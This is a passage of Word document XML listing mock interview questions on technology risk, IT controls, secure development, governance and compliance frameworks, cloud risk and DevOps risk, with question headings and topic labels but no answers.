        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What is risk appetite and risk tolerance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do you prioritize risks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Explain the risk management lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What is a risk register?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What information should a risk register contain?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How do you create a risk heat map?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 27 - Technology Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Walk me through a risk assessment for deploying a new cloud application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How do you identify technology risks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What techniques do you use for risk identification?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What is qualitative vs quantitative risk analysis?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Explain likelihood and impact scoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do you calculate risk severity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is FMEA?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What is scenario analysis?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Explain risk acceptance, avoidance, mitigation, and transfer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Give an example of a risk you mitigated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 28 - IT Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What are preventive controls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What are detective controls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What are corrective controls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Give examples of each control type in cloud infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. How do you validate control effectiveness?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. What is segregation of duties?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is least privilege?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</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 Explain RBAC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What are compensating controls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How do you monitor control failures?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 29 - SDLC and Secure Development Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How do you integrate risk into SDLC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What risks should be reviewed during BRD/PRD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you review architecture from a risk perspective?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What security controls should exist before production deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Explain Secure SDLC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. What are threat modeling techniques?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is STRIDE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What is attack surface?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What is shift-left security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How do DevSecOps practices reduce risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 30 - Governance and Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What is ISO 27001?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Explain the ISO 27001 Annex A controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What is NIST Cybersecurity Framework?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What are the five NIST functions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What is COBIT?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. What is the difference between ISO 27001 and NIST?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is FAIR?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What is an IT audit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What evidence is typically collected during audits?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How do you manage audit findings?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 31 - Cloud Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What are cloud security risks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Explain the Shared Responsibility Model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What are the risks of public cloud?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How do you secure GCP projects?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What are IAM best practices?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. What risks exist in Kubernetes clusters?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What are the risks of Terraform automation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How do you secure Terraform state files?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How do you approach secrets management?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What are common cloud misconfiguration risks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Risk</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 32 - Kubernetes and DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What are the risks of CI/CD pipelines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How do you secure Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What are the risks of GitHub Actions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What is supply chain security?</w:t>
      </w:r>
    </w:p>
    <w:p>
